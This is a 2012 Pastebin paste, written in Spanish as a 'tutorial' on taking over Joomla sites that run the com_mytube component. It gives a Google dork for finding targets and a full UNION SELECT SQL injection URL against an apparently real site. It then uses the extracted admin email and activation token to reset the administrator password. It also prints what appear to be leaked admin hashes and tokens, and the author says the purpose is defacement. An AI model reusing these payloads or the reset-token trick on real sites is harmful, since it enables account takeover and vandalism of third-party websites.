API tools faq
paste
Advertisement
YeiZeta

Joomla Fail Tutorial YeiZeta"!>

YeiZeta
Sep 5th, 2012
498
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.50 KB | None | 0 0
raw download clone embed print report
  1. -----------------------------------------------------------------------------------
  2. ___________ ====================================
  3. |.---------.| SEGURIDAD INFORMATICA
  4. ||no jueges|| YEI ZETA (TUTORIAL)>-Medianfire.es.tl .orionDeep
  5. ||al mejor ||=======================================================
  6. ||Operderas||
  7. |'---------'|
  8. `)__ ____('
  9. [=== -- o ]--.
  10. __'---------'__ \
  11. [::::::::::: :::] )
  12. `""'"""""'""""`/T\
  13. \_/
  14. -----------------------------------------------------------------------------------
  15. -Dork
  16. -Remplazar /Index
  17. -AtackSQl
  18. -ResetPassword
  19. -ConfirmacionTest
  20. -AdminLogin
  21. -Administrador /administrador
  22. -----------------------------------------------------------------------------------
  23. ATENCION YEI ZETA POST:Todo los tutoriales quedaran en un limite de personas que
  24. los usen sea para solo publicidad o para un defacement.
  25. -----------------------------------------------------------------------------------
  26. Primero que todo hola soy yei zeta seguridad de redes y paginas webs contactame:
  27. [email protected]
  28.  
  29. lo que haremos es tratar de confirmar una contraseña con el mismo valor de TEst.
  30.  
  31. Comienza.....
  32. -----------------------------------------------------------------------------------
  33. Buscamos la siguiente Dork:inurl:"option=com_mytube" en google la cual nos saldra
  34. unas grandes variedades de paginas escojen una por ejemplo aca tengo la mia.
  35.  
  36. http://test.hariomgroup.net/index.php?view=video&id=4164&option=com_m
  37.  
  38. http://--> no esta protegida en https por si algo nos costaria.
  39. test.hariomgroup.net->Test.Vemos que su confirmacion de test es posiblemente accedible.
  40.  
  41. index.php?view=video&id=4164&option=com_m tenemos el resto de la extencion de la URL
  42. principal que tambien es muy pero muy igual al dork que pusimos en google.
  43. -------------------------------------------------------------------------------------
  44. lo que haremos es remplasarla.
  45.  
  46. Por esta quetenemos aca:
  47.  
  48. /index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
  49. -----------------------------------------------------------------------------------
  50. Nos quedaria haci:
  51.  
  52. http://test.hariomgroup.net/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
  53. -----------------------------------------------------------------------------------
  54. Added: :Administrator:[email protected]:5a390aef7a5e25fd77004551e122fab4:$1$6a4cb497$
  55. From: 25
  56. Views: 8
  57. ----------------------------------------------------------------------------------------
  58. ahora los que nos falta es lo siguiente:
  59.  
  60. Incluir en nuestra direccion:/index.php?option=com_user&view=reset
  61.  
  62. quedaria haci:
  63.  
  64. http://test.hariomgroup.net/index.php?option=com_user&view=reset
  65.  
  66.  
  67. nos pide ahora que escribamos el correo electronico pero el que pondremos es el que encontramos cuando explotamos la web:
  68.  
  69. [email protected] ->Correo
  70.  
  71. ahora nos saldra:
  72.  
  73.  
  74. ACTUALIZACIÓN: Joomla! 1.5.16 ahora hashes restablecer el token
  75.  
  76. si usted ve algo así: $ 1 $ 14,411: después del código de activación, que no funcionará
  77.  
  78. Si has hecho todo bien, la página se cargará contraseña. Introduzca su contraseña de nuevo .
  79. -----------------------------------------------------------------------------------
  80. Seguridad Informatica:Yei zeta contac:[email protected]
  81. ----------------------------------------------------------------------------------
  82. Bueno si se les hace mas facil solamente
  83.  
  84. Tomamos encuenta esta parte:
  85.  
  86. http://test.hariomgroup.net/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
  87.  
  88. lo cual seria:
  89.  
  90. [email protected]
  91. ContraseñaEncryptada:bf571721b3b59f91ff87153745314ef3:$1$fd8dd059$
  92.  
  93. http://test.hariomgroup.net/administrator/
  94.  
  95. --------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!